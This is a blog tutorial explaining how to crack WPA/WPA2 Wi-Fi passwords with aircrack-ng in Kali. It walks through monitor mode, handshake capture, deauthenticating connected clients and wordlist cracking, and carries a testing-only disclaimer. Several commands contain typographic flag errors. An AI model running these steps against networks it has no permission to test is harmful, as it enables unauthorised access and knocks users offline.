©2019 Security Unleashed | New Delhi

  • Animesh Gupta

How To Crack WPA/WPA2 Wi-Fi Passwords Using Aircrack-Ng In Kali

Updated: Jul 8, 2018

Introduction (The Ultimate Guide To Cracking WPA/WPA2 Wireless Networks)

This article teaches you how to easily crack WPA/WPA2 Wi-Fi passwords using the Aircrack-Ng suite In Kali Linux.

Before we begin, you’ll require the following:

  • Kali Linux (could be live CD, installed OS, or virtual machine).

  • A WiFi adapter that is able of injecting packets and going into “monitor” mode. Unless you are lucky to have a computer with factory network cards that possess this capability, then you’ll probably need to purchase an external WiFi adapter.

  • Multiple diverse wordlists to attempt to crack the WPA handshake password once it has been captured by airdump-ng.

  • Having computing power, resources, and money isn’t enough. Time, dedication, consistency, and patience are required to succeed.

NOTE: This tutorial is for educational purposes only. You acknowledge that you are using your newly acquired knowledge to perform penetration testing on your own test network environment and router device.

This article is split into four sections in which I strive to explain most simply the following:

  • How to easily hack a Wi-Fi network’s WPA/WPA2 handshake password so you can learn quickly and retain this information for the future.

  • I will provide effective troubleshooting solutions for issues/bugs surrounding external WiFi adapters and the common problems that prevent you from cracking a WiFi’s password.

  • I will give you the best tips on obtaining the WiFi’s password using the Aircrack-ng suite which will lead to higher success. Along, I will provide an illustration of the differences between the pros and the amateurs which ultimately illuminate my former objective of this article.

  • Lastly, I will provide download links to many different wordlists that I recommend that you can use to crack WEP/WPA/WPA2.

Let’s start!

How to Easily Hack A Wi-Fi Network’s WPA/WPA2 Handshake Password

Penetration Of A Wireless Network Starts With Logging Into Kali

If you haven’t already login to Kali, the default login information is: root(Username) and toor (Password)

Plug In A Compatible Packet Injection WiFi Card Into Your Computer’s USB Port

Plug in the external WiFi adapter into your computer’s USB port. If your computer already has a factory WiFi card, then nevermind. If you are using virtualization software, there is going to be an icon that you need to click on and select the device. Make sure to add the USB device filter if you are using VirtualBox.

Recommended USB Wi-Fi Plug-And-Play Cards For Kali Linux

Here is my list of top three recommended USB plug-and-play cards Wi-Fi cards for Kali Linux:

TP-Link WN722 (2.4GHz, first version only)

Alfa AWUS036NHA (2.4GHz)

Alfa AWUS036H (2.4GHz)

Plug-and-play USB Wi-Fi adapters mean that no drivers are required to get the external Wi-Fi card working. Just plug in the external card into a USB port and enjoy.

Package Description:

Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured.

It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools.

Here are the basic steps we will be going through:

  • Install the latest aircrack-ng

  • Start the wireless interface in monitor mode using airmon-ng

  • Start airodump-ng on AP channel with filter for BSSID to collect authentication handshake

  • [Optional] Use aireplay-ng to deauthenticate the wireless client

  • 4. Run aircrack-ng to crack the WPA/WPA2-PSK using the authentication handshake

Open A Terminal In KaliIn terminal, type in: airmon-ng

This will list all of the wireless cards that support monitor (not injection) mode. If no cards are listed, try disconnecting and reconnecting the adapter (if you’re using one) and check that it supports monitor mode.

You can see here that my card supports monitor mode and that it’s listed as wlan0.

Type airmon-ng start followed by the interface name of your wireless card.

airmon-ng start wlan0

The “(monitor mode enabled)” message means that the card has successfully been put into monitor mode. Note the name of the new monitor interface, mon0.

ifconfig [interface of wireless card]

Replace [interface of wireless card] with the name of the interface that you enabled mon0 on; probably called wlan0.

This disables the wireless card from connecting to the internet, allowing it to focus on monitor mode instead.

After you have disabled mon0 (completed the wireless section of the tutorial), you’ll need to enable wlan0 (or name of wireless interface), by typing: ifconfig [interface of wireless card] up and pressing Enter.

Type airodump-ng followed by the name of the new monitor interface, which is probably mon0.

A bug discovered in Kali Linux makes airmon-ng set the channel as fixed "-1" when you first enable mon0.

If you receive a “fixed channel –1” error, follow the steps after enabling mon0.

Airodump will now list all of the wireless networks in your area, and a lot of useful information about them.

Locate your network or the network that you have permission to penetration test.

Once you’ve spotted your network on the ever-populating list, hit Ctrl + C on your keyboard to stop the process. Note the channel of your target network.

Copy the BSSID of the target network

Now type this command:

airodump-ng -c [channel] –bssid [bssid] -w /root/Desktop/ [monitor interface]

Replace [channel] with the channel of your target network. Paste the network BSSID where [bssid] is, and replace [monitor interface] with the name of your monitor-enabled interface, (mon0).

The “–w” and file path command specifies a place where airodump will save any intercepted 4-way handshakes (necessary to crack the password). Here we saved it to the Desktop, but you can save it anywhere.

A complete command should look similar this:

airodump-ng -c 10 –bssid 00:14:BF:E0:E8:D5 -w /root/Desktop/ mon0

Now press enter.

Airodump with now monitor only the target network, allowing us to capture more specific information about it.

What we’re really doing now is waiting for a device to connect or reconnect to the network, forcing the router to send out the four-way handshake that we need to capture in order to crack the password.

Also, four files should show up on your desktop, this is where the handshake will be saved when captured, so don’t delete them!

But we’re not really going to wait for a device to connect, no, that’s not what impatient hackers do.

We’re actually going to use another cool-tool that belongs to the aircrack suitecalled aireplay-ng, to speed up the process.

Instead of waiting for a device to connect, hackers can use this tool to force a device to reconnect by sending deauthentication (deauth) packets to one of the networks devices, making it think that it has to reconnect with the network.

in order for this tool to work, there has to be someone else connected to the network first, so watch the airodump-ng and wait for a client to show up. It might take a long time, or it might only take a second before the first one shows.

If none show up after a lengthy wait, then the network might be empty right now, or you’re to far away from the network.

next step:

Leave airodump-ng running and open a second terminal. In this terminal, type this command:

aireplay-ng –0 2 –a [router bssid] –c [client bssid] mon0

  • The –0 is a short cut for the deauth mode

  • 2 is the number of deauth packets to send.

  • -a indicates the access point/router’s BSSID

  • -c indicates the client’s BSSID

  • mon0 merely means the monitor interface

My complete command looks like this:

aireplay-ng –0 2 –a 00:14:BF:E0:E8:D5 –c 4C:EB:42:59:DE:31 mon0

Upon hitting Enter, you’ll see aireplay-ng send the packets.

If you were close enough to the target client, and the deauthentication process works, this message will appear on the airodump screen (which you left open):

This means that the handshake has been captured, the password is in the hacker’s hands, in some form or another.

You can close the aireplay-ng terminal and hit Ctrl + C on the airodump-ng terminal to stop monitoring the network, but don't close this window just incase you need some of the information later.

Open a new Terminal, and type in this command:

aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap

  • -a is the method aircrack will use to crack the handshake.

  • -b stands for bssid, replace [router bssid] with the BSSID of the target router

  • -w stands for wordlist

  • /root/Desktop/*.cap is the path to the .cap file containing the password.

My complete command looks like this:

aircrack-ng –a2 –b 00:14:BF:E0:E8:D5 –w /root/wpa.txt /root/Desktop/*.cap

Aircrack-ng will now launch into the process of cracking the password.

crack it if the password happens to be in the wordlist that you’ve selected. Sometimes, it’s not.

If this is the case, you can try other wordlists.

If you simply cannot find the password no matter how many wordlists you try, then it appears your penetration test has failed, and the network is at least safe from basic brute-force attacks.

If the phrase is in the wordlist, then aircrack-ng will show it too you like this:

The passphrase to our test-network was “notsecure,” and you can see here that it was in the wordlist, and aircrack found it.

If you find the password without a decent struggle, then change your password, if it’s your network. If you’re penetration testing for someone, then tell them to change their password as soon as possible.

Happy Hacking!